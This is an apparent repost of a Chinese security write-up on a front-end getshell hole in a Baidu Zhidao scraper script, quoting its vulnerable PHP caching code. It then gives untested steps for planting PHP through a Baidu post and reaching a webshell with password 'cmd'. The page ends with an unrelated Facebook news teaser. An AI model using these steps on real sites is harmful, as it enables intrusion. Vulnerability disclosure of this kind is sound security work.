read.php
|
以下是引用片段:
include( "require.php" );
if ( $cacheis == 1 && file_exists( "cache/read/".$_GET['id'].".html" ) )
//要开启缓存
{
$filemtime = filemtime( "cache/read/".$_GET['id'].".html" );
$dqtime = strtotime( date( "Y-m-d H:i:s" ) );
$time = round( ( $dqtime - $filemtime ) / 60 );
if ( $time
{
include( "cache/read/".$_GET['id'].".html" );
//包含HTML 以下说到怎么搞这个HTML
exit( );
}
}
$html = geturldata( "http://zhidao.baidu.com/question/".$_GET['id'].".html" );
//以下是转换代码 省
if ( $cacheis == 1 )
{
cache( $_GET['id'], "read", "read" );
}
//再看cache
function cache($id,$pn,$type)
{
$content = ob_get_contents();
if($type!="list")
$fp = fopen("cache/".$type."/".$id.".html", "w");
else
$fp = fopen("cache/".$type."/".$id.$pn.".html", "w");
fwrite($fp, $content);
fclose($fp);
}
|
怎么操作呢 先在百度知道发一篇东西 带有PHP代码的 (*^__^*) 嘻嘻 然后就 (*^__^*) 嘻嘻
这个洞还是比较经典的,以下是EXP。未测试。
1.在百度写一个帖子,比如帖子ID=xxoo,帖子中带有如下代码::")?> 。
2.然后访问http://127.0.0.1/read.php?id=xxoo
3.我们的马地址http://127.0.0.1/wind.php 密码 cmd.
但是我还有点不确定的是 $content这个函数里面的内容。。
文章来源于lcx.cc:虐神百度小偷v1.0 前台GET SHELL
相关推荐: Facebook 成硅谷黄埔 前员工掀起创业新高潮
腾讯科技讯(玉临) 北京时间4月9日消息,据国外媒体报道,一批此前在Facebook工作的工程师们曾改变了这个世界,而如今他们再次聚在了一起,准备旧戏重演。 当前,业界所有人的目光几乎都盯着Facebook,这家社交网络巨头正有条不紊的进行着首次公开募股,据估…
评论